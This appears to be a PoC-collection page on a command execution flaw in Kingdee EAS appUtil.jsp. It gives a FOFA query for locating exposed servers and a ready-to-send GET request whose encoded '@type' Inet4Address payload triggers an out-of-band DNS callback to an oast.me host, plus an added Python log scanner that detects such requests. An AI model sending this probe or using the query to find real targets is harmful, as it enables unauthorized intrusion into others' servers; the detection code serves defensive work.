POC/wpoc/金蝶/金蝶EAS存在appUtil.jsp命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00


Kingdee EAS appUtil.jsp Command Execution Vulnerability

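Multiple versions of Kingdee EAS and Kingdee EAS Cloud contain a file upload vulnerability. An unauthorized attacker can send a specially crafted request, or upload a malicious webshell file, to achieve remote code execution and take control of the server.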

fofa

app="Kingdee-EAS"

poc

GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22csbs1ru8ki46d67eiob0ywz51btedcjtj.oast.me%22%7D%7D HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
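
Added example, not part of the original PoC page: a log check a defender could run to spot requests shaped like the one above, meaning a `list` parameter on `appUtil.jsp` whose decoded JSON carries an `@type` key. The access-log format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import json
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Path from the request on this page, lowercased for case-insensitive matching.
TARGET_PATH = "/easportal/tools/apputil.jsp"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses and hostnames are placeholders.
LINE = '{} - - [04/Mar/2025:10:00:01 +0800] "GET {} HTTP/1.1" 200 12'
SAMPLE_LOG = [
    LINE.format("203.0.113.7", "/easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type"
                "%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22canary.example.invalid%22%7D%7D"),
    LINE.format("198.51.100.4", "/easportal/tools/appUtil.jsp?list=%5B1%2C2%5D"),
    LINE.format("198.51.100.9", "/easportal/index.jsp"),
    LINE.format("192.0.2.55", "/easportal/tools/APPUTIL.jsp?list=%257B%2522%2540type%2522%253A%2522java.net.Inet4Address%2522%257D"),
]

def find_type_keys(node, found):
    """Collect every "@type" string value in a decoded JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type" and isinstance(value, str):
                found.append(value)
            find_type_keys(value, found)
    elif isinstance(node, list):
        for item in node:
            find_type_keys(item, found)
    return found

def inspect_line(line):
    """Return a finding for a request to appUtil.jsp carrying "@type", else None."""
    if not (m := REQUEST_RE.search(line)):
        return None
    parts = urlsplit(m.group("uri"))
    if unquote(parts.path).split(";")[0].lower() != TARGET_PATH:
        return None
    for value in (v for n, v in parse_qsl(parts.query, keep_blank_values=True) if n == "list"):
        # parse_qsl decodes once; unquote again to catch double-encoded values.
        for candidate in (value, unquote(value)):
            try:
                types = find_type_keys(json.loads(candidate), [])
            except ValueError:  # not valid JSON: fall back to a substring check
                types = ["<unparsed>"] if "@type" in candidate else []
            if types:
                return {"client": line.split()[0], "types": types}
    return None

def scan(lines):
    return [hit for hit in map(inspect_line, lines) if hit]
```

`scan(SAMPLE_LOG)` flags the first and fourth lines (single- and double-encoded `@type`) and ignores the benign `list=[1,2]` request and the unrelated page.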


Vulnerability source